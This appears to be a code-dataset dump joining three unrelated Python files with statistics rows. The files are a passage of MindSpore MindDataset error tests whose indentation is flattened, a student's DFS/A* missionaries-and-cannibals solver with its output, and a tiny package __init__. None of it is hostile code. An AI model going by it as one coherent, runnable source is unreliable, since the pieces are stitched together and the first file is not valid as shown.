if os.path.exists("{}.db".format(CV1_FILE_NAME)):
os.remove("{}.db".format(CV1_FILE_NAME))
writer = FileWriter(CV1_FILE_NAME, files_num)
writer.set_page_size(1 << 26) # 64MB
cv_schema_json = {"file_name": {"type": "string"}, "label": {"type": "int32"}, "data": {"type": "bytes"}}
data = [{"file_name": "001.jpg", "label": 43, "data": bytes('0xffsafdafda', encoding='utf-8')}]
writer.add_schema(cv_schema_json, "img_schema")
writer.add_index(["file_name", "label"])
writer.write_raw_data(data)
writer.commit()
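# Editor's note: the three writer helpers above differ only in target file,
# schema key, and page size. A consolidated sketch (editorial illustration;
# the originals above are kept verbatim):
def _create_mindrecord_sketch(file_name, files_num, name_key="file_name", page_size=None):
    # Clear any stale record and index files before writing.
    if os.path.exists(file_name):
        os.remove(file_name)
    if os.path.exists("{}.db".format(file_name)):
        os.remove("{}.db".format(file_name))
    writer = FileWriter(file_name, files_num)
    if page_size is not None:
        writer.set_page_size(page_size)
    cv_schema_json = {name_key: {"type": "string"}, "label": {"type": "int32"},
                      "data": {"type": "bytes"}}
    writer.add_schema(cv_schema_json, "img_schema")
    writer.add_index([name_key, "label"])
    writer.write_raw_data([{name_key: "001.jpg", "label": 43,
                            "data": bytes('0xffsafdafda', encoding='utf-8')}])
    writer.commit()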
def test_cv_lack_json():
"""tutorial for cv minderdataset."""
create_cv_mindrecord(1)
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception):
ds.MindDataset(CV_FILE_NAME, "no_exist.json", columns_list, num_readers)
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_lack_mindrecord():
"""tutorial for cv minderdataset."""
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception, match="does not exist or permission denied"):
_ = ds.MindDataset("no_exist.mindrecord", columns_list, num_readers)
def test_invalid_mindrecord():
with open('dummy.mindrecord', 'w') as f:
f.write('just for test')
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset('dummy.mindrecord', columns_list, num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert num_iter == 0
except Exception as error:
os.remove('dummy.mindrecord')
raise error
else:
os.remove('dummy.mindrecord')
def test_minddataset_lack_db():
create_cv_mindrecord(1)
os.remove("{}.db".format(CV_FILE_NAME))
columns_list = ["data", "file_name", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert num_iter == 0
except Exception as error:
os.remove(CV_FILE_NAME)
raise error
else:
os.remove(CV_FILE_NAME)
def test_cv_minddataset_pk_sample_error_class_column():
create_cv_mindrecord(1)
columns_list = ["data", "file_name", "label"]
num_readers = 4
sampler = ds.PKSampler(5, None, True, 'no_exsit_column')
with pytest.raises(Exception, match="MindRecordOp launch failed"):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, sampler=sampler)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_minddataset_pk_sample_exclusive_shuffle():
create_cv_mindrecord(1)
columns_list = ["data", "file_name", "label"]
num_readers = 4
sampler = ds.PKSampler(2)
with pytest.raises(Exception, match="sampler and shuffle cannot be specified at the same time."):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers,
sampler=sampler, shuffle=False)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_minddataset_reader_different_schema():
create_cv_mindrecord(1)
create_diff_schema_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset([CV_FILE_NAME, CV1_FILE_NAME], columns_list,
num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
os.remove(CV1_FILE_NAME)
os.remove("{}.db".format(CV1_FILE_NAME))
def test_cv_minddataset_reader_different_page_size():
create_cv_mindrecord(1)
create_diff_page_size_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception, match="MindRecordOp init failed"):
data_set = ds.MindDataset([CV_FILE_NAME, CV1_FILE_NAME], columns_list,
num_readers)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
os.remove(CV1_FILE_NAME)
os.remove("{}.db".format(CV1_FILE_NAME))
def test_minddataset_invalidate_num_shards():
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 1, 2)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 0).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_minddataset_invalidate_shard_id():
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 1, -1)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 0).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_minddataset_shard_id_bigger_than_num_shard():
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 2, 2)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 1).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
with pytest.raises(Exception) as error_info:
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers, True, 2, 5)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
try:
assert 'Input shard_id is not within the required interval of (0 to 1).' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
def test_cv_minddataset_partition_num_samples_equals_0():
"""tutorial for cv minddataset."""
create_cv_mindrecord(1)
columns_list = ["data", "label"]
num_readers = 4
def partitions(num_shards):
for partition_id in range(num_shards):
data_set = ds.MindDataset(CV_FILE_NAME, columns_list, num_readers,
num_shards=num_shards,
shard_id=partition_id, num_samples=0)
num_iter = 0
for _ in data_set.create_dict_iterator(num_epochs=1):
num_iter += 1
with pytest.raises(Exception) as error_info:
partitions(5)
try:
assert 'num_samples should be a positive integer value, but got num_samples=0' in str(error_info.value)
except Exception as error:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
raise error
else:
os.remove(CV_FILE_NAME)
os.remove("{}.db".format(CV_FILE_NAME))
if __name__ == '__main__':
test_cv_lack_json()
test_cv_lack_mindrecord()
test_invalid_mindrecord()
test_minddataset_lack_db()
test_cv_minddataset_pk_sample_error_class_column()
test_cv_minddataset_pk_sample_exclusive_shuffle()
test_cv_minddataset_reader_different_schema()
test_cv_minddataset_reader_different_page_size()
test_minddataset_invalidate_num_shards()
test_minddataset_invalidate_shard_id()
test_minddataset_shard_id_bigger_than_num_shard()
test_cv_minddataset_partition_num_samples_equals_0()
37.8125 | 111 | 0.663332 | 1,598 | 11,495 | 4.449937 | 0.125782 | 0.090001 | 0.067501 | 0.054001 | 0.811138 | 0.778793 | 0.751934 | 0.728449 | 0.691323 | 0.681198 | 0 | 0.015827 | 0.214006 | 11,495 | 303 | 112 | 37.937294 | 0.771223 | 0.074206 | 0 | 0.727642 | 0 | 0 | 0.125519 | 0.004058 | 0 | 0 | 0 | 0 | 0.028455 | 1 | 0.065041 | false | 0 | 0.01626 | 0 | 0.081301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
910b60265fd545a298352a048db71f0afe00a521 | 21,958 | py | Python | mission_cannibal_Mike_Boodoo.py | BluedragonXVI/missionary_cannibal | 0e9edfbb60acc41f46477ca5ef7e39c41fb95b1b | ["MIT"] | null | null | null | mission_cannibal_Mike_Boodoo.py | BluedragonXVI/missionary_cannibal | 0e9edfbb60acc41f46477ca5ef7e39c41fb95b1b | ["MIT"] | null | null | null | mission_cannibal_Mike_Boodoo.py | BluedragonXVI/missionary_cannibal | 0e9edfbb60acc41f46477ca5ef7e39c41fb95b1b | ["MIT"] | null | null | null
import heapq
# Michael Boodoo
# Artificial Intelligence Assign 01
# DFS and A* algorithms acting on a Node class whose state is represented as a dictionary
# DFS's fringe/frontier is a list and A*'s is a min-priority queue, using the heapq module
# Since dictionaries aren't hashable, the closed/reached set contains the string representation of the state, str(Node.state)
# The Node class has a global node counter that is cleared after DFS or A* is run
# Main work happens in the Node.perform_action method, which takes an action from the action tuple and ensures it is valid
# A new node is only generated if the resulting state is valid and satisfies the constraints of the problem
# Output and discussion at end
class Node:
node_count = 0
    def __init__(self, state:dict, parent, prev_action, depth:int, total_cost:int):
        self.state = state
        self.parent:Node = parent
        self.prev_action:tuple = prev_action
        self.depth = depth
        self.total_cost = total_cost  # f(n); filled in for A*-generated nodes
        Node.node_count += 1
def A_star_cost(self, depth): # f(n) used in A*
# need total number on left for both side heuristics
num_left = self.state[ML] + self.state[CL]
if self.state["position"] == left and num_left < 3:
return 1 + depth
elif self.state["position"] == left and num_left > 2:
return ((num_left-2)*2)+1+depth
elif self.state["position"] == right:
return (2*num_left) + depth
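    # Worked example of A_star_cost (illustrative only): in the initial state all
    # 3 miss and 3 cann are on the left, so num_left = 6 > 2 and
    # h = (6 - 2) * 2 + 1 = 9, giving f(n) = 9 at depth 0; this matches the
    # f(n) = 9 values printed for the early solution nodes in the output below.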
def print_path(self, flag:bool):
num_miss:int
num_cann:int
direction = ""
while self.parent is not None:
for miss, cann in self.prev_action.items():
num_miss, num_cann = miss, cann
if (self.state["position"] == left):
direction = right
else:
direction = left
            if not flag:
print("DFS SOLUTION NODE -", str(self.state), "at depth: ",self.depth, "by bringing", num_miss, "miss and", num_cann, " cann from the", direction)
else:
print("A* SOLUTION NODE -", str(self.state), "at depth: ",self.depth, "by bringing", num_miss, "miss and", num_cann, " cann from the", direction, "f(n) =", self.total_cost)
self = self.parent
print("INITIAL NODE -", str(self.state), "at depth: ",self.depth)
def perform_action(self, action:dict, fringe:list, reached:set):
num_miss:int
num_cann:int
for miss, cann in action.items():
num_miss, num_cann = miss, cann
# check if action is actually possible (enough miss or cann on that side)
# for initial state, {3,3,L,0,0} gave me no missed actions as expected
if self.state["position"] == left: # all actions will be applied to left -> right
if num_miss > self.state[ML]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CL]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] - num_miss, self.state[MR] + num_miss
next_cann_left, next_cann_right = self.state[CL] - num_cann, self.state[CR] + num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":right, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
new_node.total_cost = new_node.A_star_cost(self.depth)
print("New unique node created with state:", new_state, "with depth:", new_node.depth)
fringe.append(new_node)
reached.add(state_string)
#print("state string added to reached with value:", state_string)
if self.state["position"] == right: # all actions will be applied to right -> left
if num_miss > self.state[MR]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CR]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] + num_miss, self.state[MR] - num_miss
next_cann_left, next_cann_right = self.state[CL] + num_cann, self.state[CR] - num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":left, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
print("New unique node created with state:", new_state, "with depth:", new_node.depth)
fringe.append(new_node)
reached.add(state_string)
#print("state string added to reached with value:", state_string)
# A_star action
def perform_action_a_star(self, action:dict, priority_queue, reached:set):
num_miss:int
num_cann:int
for miss, cann in action.items():
num_miss, num_cann = miss, cann
# check if action is actually possible (enough miss or cann on that side)
# for initial state, {3,3,L,0,0} gave me no missed actions as expected
if self.state["position"] == left: # all actions will be applied to left -> right
if num_miss > self.state[ML]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CL]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] - num_miss, self.state[MR] + num_miss
next_cann_left, next_cann_right = self.state[CL] - num_cann, self.state[CR] + num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":right, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
new_node.total_cost = new_node.A_star_cost(new_node.depth)
print("New unique node created with state:", new_state, "with depth:", new_node.depth, "and A* cost:", new_node.total_cost)
#fringe.append(new_node)
heapq.heappush(priority_queue, (new_node.total_cost, state_string, new_node))
reached.add(state_string)
#print("state string added to reached with value:", state_string)
if self.state["position"] == right: # all actions will be applied to right -> left
if num_miss > self.state[MR]:
#print("Action not performed, not enough miss to move, num_miss: ", num_miss)
return # ensure there are enough miss and cann to transfer
if num_cann > self.state[CR]:
#print("Action not performed, not enough cann to move, num_cann: ", num_cann)
return
# now ensure that the state is legal (cann don't outnumber miss)
next_miss_left, next_miss_right = self.state[ML] + num_miss, self.state[MR] - num_miss
next_cann_left, next_cann_right = self.state[CL] + num_cann, self.state[CR] - num_cann
if next_cann_left > next_miss_left and next_miss_left > 0:
#print("Illegal move detected, cannibals:", next_cann_left, " outnumber missionaries:", next_miss_left, "on left!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, "missionaries to the right")
return
if next_cann_right > next_miss_right and next_miss_right > 0:
#print("Illegal move detected, cannibals:", next_cann_right, " outnumber missionaries:", next_miss_right, "on right!")
#print("The attemped move was sending", num_cann, "cannibals and", num_miss, " missionaries to the right")
return
# legal nodes can now be added to frontier/fringe
# create the state of the new node
new_state:dict = {ML:next_miss_left, CL:next_cann_left, "position":left, MR:next_miss_right, CR:next_cann_right}
state_string = str(new_state)
if state_string not in reached:
new_node:Node = Node(new_state, self, action, self.depth+1, None)
new_node.total_cost = new_node.A_star_cost(new_node.depth)
print("New unique node created with state:", new_state, "with depth:", new_node.depth, "and A* cost:", new_node.total_cost)
#fringe.append(new_node)
heapq.heappush(priority_queue, (new_node.total_cost, state_string, new_node))
reached.add(state_string)
#print("state string added to reached with value:", state_string)
if __name__ == "__main__":
ML, MR = "miss_left", "miss_right"
CL, CR = "cann_left", "cann_right"
left, right = "left", "right"
frontier:list = []
actions:tuple = ({2:0}, {0:2}, {1:1}, {1:0}, {0:1}) # tuple of {miss:cann} entries. key of tuple entry is miss, value of tuple entry is cann
initial_state = {ML:3, CL:3, "position":left, MR:0, CR:0}
goal_state = {ML:0, CL:0, "position":right, MR:3, CR:3}
reached:set = set()
Node.node_count = 0
    initial_node = Node(initial_state, None, None, 0, None)
for action in actions: # each item is a miss:cann dictionary
a_star_flag = False
        initial_node.perform_action(action, frontier, reached)
found_solution = False
    while frontier and not found_solution:
current_node:Node = frontier.pop()
if current_node.state == goal_state:
print("VALID STATE REACHED at depth:", current_node.depth)
found_solution = True
current_node.print_path(a_star_flag)
print("Number of nodes created:", Node.node_count)
break
else:
for action_2 in actions:
current_node.perform_action(action_2, frontier, reached)
print("End reached...")
reached.clear()
# A* version of above which is same except for min_priority_queue operations
Node.node_count = 0
reached_a_star:set = set()
priority_queue = []
for action in actions: # each item is a miss:cann dictionary
a_star_flag = True
        initial_node.perform_action_a_star(action, priority_queue, reached_a_star)
found_solution = False
    while priority_queue and not found_solution:
popped_node_tuple = heapq.heappop(priority_queue)
current_node:Node = popped_node_tuple[2]
if current_node.state == goal_state:
print("VALID STATE REACHED at depth:", current_node.depth)
found_solution = True
current_node.print_path(a_star_flag)
print("Number of nodes created:", Node.node_count)
break
else:
for action_2 in actions:
current_node.perform_action_a_star(action_2, priority_queue, reached_a_star)
print("End reached...")
reached_a_star.clear()
# Code output and analysis below:
# Without using a reached set, DFS never stopped and generated nodes at depth > 40,000 until manually stopping program
# Using a reached set, DFS found a solution at depth 11 while generating 15 legal nodes, output below:
# Solution nodes output in reverse order (Goal_state -> ... -> Initial_state) along with action previously applied to get to that state
"""
VALID STATE REACHED at depth: 11
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 0, 'position': 'right', 'miss_right': 3, 'cann_right': 3} at depth: 11 by bringing 0 miss and 2 cann from the left
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'left', 'miss_right': 3, 'cann_right': 1} at depth: 10 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 1, 'position': 'right', 'miss_right': 3, 'cann_right': 2} at depth: 9 by bringing 0 miss and 2 cann from the left
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 3, 'position': 'left', 'miss_right': 3, 'cann_right': 0} at depth: 8 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'right', 'miss_right': 3, 'cann_right': 1} at depth: 7 by bringing 2 miss and 0 cann from the left
DFS SOLUTION NODE - {'miss_left': 2, 'cann_left': 2, 'position': 'left', 'miss_right': 1, 'cann_right': 1} at depth: 6 by bringing 1 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 1, 'cann_left': 1, 'position': 'right', 'miss_right': 2, 'cann_right': 2} at depth: 5 by bringing 2 miss and 0 cann from the left
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'left', 'miss_right': 0, 'cann_right': 2} at depth: 4 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 0, 'position': 'right', 'miss_right': 0, 'cann_right': 3} at depth: 3 by bringing 0 miss and 2 cann from the left
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 2, 'position': 'left', 'miss_right': 0, 'cann_right': 1} at depth: 2 by bringing 0 miss and 1 cann from the right
DFS SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'right', 'miss_right': 0, 'cann_right': 2} at depth: 1 by bringing 0 miss and 2 cann from the left
INITIAL NODE - {'miss_left': 3, 'cann_left': 3, 'position': 'left', 'miss_right': 0, 'cann_right': 0} at depth: 0
"""
# Without using a reached set, A* found a solution at depth 11 while generating 23 legal nodes, output below:
"""
VALID STATE REACHED at depth: 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 0, 'position': 'right', 'miss_right': 3, 'cann_right': 3} at depth: 11 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'left', 'miss_right': 3, 'cann_right': 1} at depth: 10 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 1, 'position': 'right', 'miss_right': 3, 'cann_right': 2} at depth: 9 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 3, 'position': 'left', 'miss_right': 3, 'cann_right': 0} at depth: 8 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'right', 'miss_right': 3, 'cann_right': 1} at depth: 7 by bringing 2 miss and 0 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 2, 'cann_left': 2, 'position': 'left', 'miss_right': 1, 'cann_right': 1} at depth: 6 by bringing 1 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 1, 'cann_left': 1, 'position': 'right', 'miss_right': 2, 'cann_right': 2} at depth: 5 by bringing 2 miss and 0 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'left', 'miss_right': 0, 'cann_right': 2} at depth: 4 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 0, 'position': 'right', 'miss_right': 0, 'cann_right': 3} at depth: 3 by bringing 0 miss and 2 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 2, 'position': 'left', 'miss_right': 0, 'cann_right': 1} at depth: 2 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'right', 'miss_right': 0, 'cann_right': 2} at depth: 1 by bringing 0 miss and 2 cann from the left f(n) = 9
INITIAL NODE - {'miss_left': 3, 'cann_left': 3, 'position': 'left', 'miss_right': 0, 'cann_right': 0} at depth: 0
Number of nodes created: 23
-------------------------------------------------------------------------------------------------------------------
"""
# Using a reached set to avoid cycles, A* found a solution at depth 11 while generating 14 nodes, output below:
"""
VALID STATE REACHED at depth: 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 0, 'position': 'right', 'miss_right': 3, 'cann_right': 3} at depth: 11 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'left', 'miss_right': 3, 'cann_right': 1} at depth: 10 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 1, 'position': 'right', 'miss_right': 3, 'cann_right': 2} at depth: 9 by bringing 0 miss and 2 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 3, 'position': 'left', 'miss_right': 3, 'cann_right': 0} at depth: 8 by bringing 0 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 0, 'cann_left': 2, 'position': 'right', 'miss_right': 3, 'cann_right': 1} at depth: 7 by bringing 2 miss and 0 cann from the left f(n) = 11
A* SOLUTION NODE - {'miss_left': 2, 'cann_left': 2, 'position': 'left', 'miss_right': 1, 'cann_right': 1} at depth: 6 by bringing 1 miss and 1 cann from the right f(n) = 11
A* SOLUTION NODE - {'miss_left': 1, 'cann_left': 1, 'position': 'right', 'miss_right': 2, 'cann_right': 2} at depth: 5 by bringing 2 miss and 0 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'left', 'miss_right': 0, 'cann_right': 2} at depth: 4 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 0, 'position': 'right', 'miss_right': 0, 'cann_right': 3} at depth: 3 by bringing 0 miss and 2 cann from the left f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 2, 'position': 'left', 'miss_right': 0, 'cann_right': 1} at depth: 2 by bringing 0 miss and 1 cann from the right f(n) = 9
A* SOLUTION NODE - {'miss_left': 3, 'cann_left': 1, 'position': 'right', 'miss_right': 0, 'cann_right': 2} at depth: 1 by bringing 0 miss and 2 cann from the left f(n) = 9
INITIAL NODE - {'miss_left': 3, 'cann_left': 3, 'position': 'left', 'miss_right': 0, 'cann_right': 0} at depth: 0
Number of nodes created: 14
"""
# DFS found a solution at the same depth as A*; I believe this is because the problem's constraints severely reduce the number of nodes generated.
# The effective branching factor is often less than 5 because of those constraints.
# A bigger initial state with more miss and cann would be worth testing to see whether the algorithms diverge (see the sketch below).
# Unlike DFS, A* found the same solution with and without a closed/reached set, whereas DFS only worked with a closed list:
# without one it was trapped in a cycle.
# If the heuristic is admissible and consistent, this suggests depth 11 is the optimal solution depth.
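# Sketch for the "bigger initial state" experiment suggested above (our addition,
# not part of the original assignment): build start/goal states for n miss and
# n cann, then reuse the same DFS and A* driver loops with them.
# def make_states(n:int):
#     start = {ML:n, CL:n, "position":left, MR:0, CR:0}
#     goal = {ML:0, CL:0, "position":right, MR:n, CR:n}
#     return start, goal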
66.138554 | 188 | 0.638765 | 3,331 | 21,958 | 4.047133 | 0.079856 | 0.033825 | 0.032045 | 0.048958 | 0.80721 | 0.792894 | 0.783844 | 0.779245 | 0.771382 | 0.765596 | 0 | 0.022577 | 0.247609 | 21,958 | 332 | 189 | 66.138554 | 0.793414 | 0.277348 | 0 | 0.660714 | 0 | 0 | 0.069853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029762 | false | 0 | 0.005952 | 0 | 0.160714 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
91263cdac61771d667f3d36e721f9b01fe1888c0 | 98 | py | Python | api/__init__.py | bnbwebexpertise/linkr | 657bdd3b5c77b67702b9398da000e19d3f5bb875 | ["MIT"] | 124 | 2016-12-23T02:14:45.000Z | 2021-11-20T15:25:20.000Z | api/__init__.py | bnbwebexpertise/linkr | 657bdd3b5c77b67702b9398da000e19d3f5bb875 | ["MIT"] | 24 | 2017-05-29T10:15:15.000Z | 2019-05-23T13:30:58.000Z | api/__init__.py | bnbwebexpertise/linkr | 657bdd3b5c77b67702b9398da000e19d3f5bb875 | ["MIT"] | 19 | 2017-05-15T13:19:07.000Z | 2021-05-14T02:35:05.000Z
# flake8: noqa: F401
from auth import *
from link import *
from misc import *
from user import *
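# Note (ours): the implicit relative imports above only work on Python 2. A
# Python 3 port of this package would need the explicit relative form:
# from .auth import *
# from .link import *
# from .misc import *
# from .user import *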
14 | 20 | 0.714286 | 15 | 98 | 4.666667 | 0.6 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051948 | 0.214286 | 98 | 6 | 21 | 16.333333 | 0.857143 | 0.183673 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6
